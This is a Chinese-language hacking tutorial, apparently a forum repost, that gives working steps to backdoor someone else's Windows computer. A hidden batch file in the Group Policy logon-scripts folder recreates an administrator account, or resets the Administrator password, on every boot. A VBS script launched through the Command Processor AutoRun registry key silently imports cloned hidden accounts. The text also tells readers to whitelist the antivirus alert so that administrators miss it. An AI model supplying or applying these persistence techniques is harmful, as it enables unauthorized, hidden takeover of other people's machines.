操作步驟：

1、在自己電腦里面建立一個.txt文本文件.
2、在里面輸入內(nèi)容：

@echo off
net user xixi 123456 /add 注釋：前面xixi是用戶名后面123456是密碼；
net localgroup administrators xixi /add

3、把這個文件保存，更改后綴為xixi.bat 注釋：前面名字隨便，后面格式一定要是bat；
4、把這個文件拷貝到對方電腦C:\WINNT\system32\GroupPolicy\User\Scripts\Logon文件目錄下，沒有的話自己創(chuàng)建。別忘了將文件屬性設(shè)為“隱藏”哦！

完成，下次對方電腦無論如何都有這個管理員帳號，刪除了，下次啟動還有！

如果把里面的內(nèi)容改成：

@echo off
net user administrator 123456 /add

意思是不管你怎么改，下次啟動管理員帳號administrator密碼一直是123456

作者：xixi

逍遙復(fù)仇點評：以上應(yīng)該對應(yīng)的就是組策略里計算機管理中的“登錄”和“注銷”腳本，打開gpedit.msc找找看，聽說此法360能檢測出來，我是沒有試，你可以先用360掃一下如果能查出來將其設(shè)為信任就OK了！

強調(diào)一下本文貌似要配合《安靜運行批處理vbs腳本》才算是完美！既然都走到這里了《建立超級隱藏賬號方法》這篇也一起看了吧！

==================================================================

另外一種命令行截持重建帳號的方法：

將已在注冊中克隆好的帳號分別導(dǎo)出一份，比如"guest$.reg"和"0x3f5.reg"復(fù)制c:\windows\目錄下，然后在同目錄下建立一個cmd.vbs腳本內(nèi)容如下：

On Error Resume Next
set yecha=wscript.createobject("wscript.shell")
yecha.run "regedit.exe /s guest$.reg",0
yecha.run "regedit.exe /s 0x3f5.reg",0

在注冊表中這個項KEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun里AutoRun鍵值中輸入我們的腳本路徑就OK。

（這個項起的作用是打開CMD自動運行我們編輯好的腳本文件）

提示：360安全衛(wèi)士能查的出來顯示為“命令行截持”，TNND，我把它加入信任了就沒事了，管理員神精了會天天翻360那個不起眼的地方？

整理作者：逍遙復(fù)仇

最新評論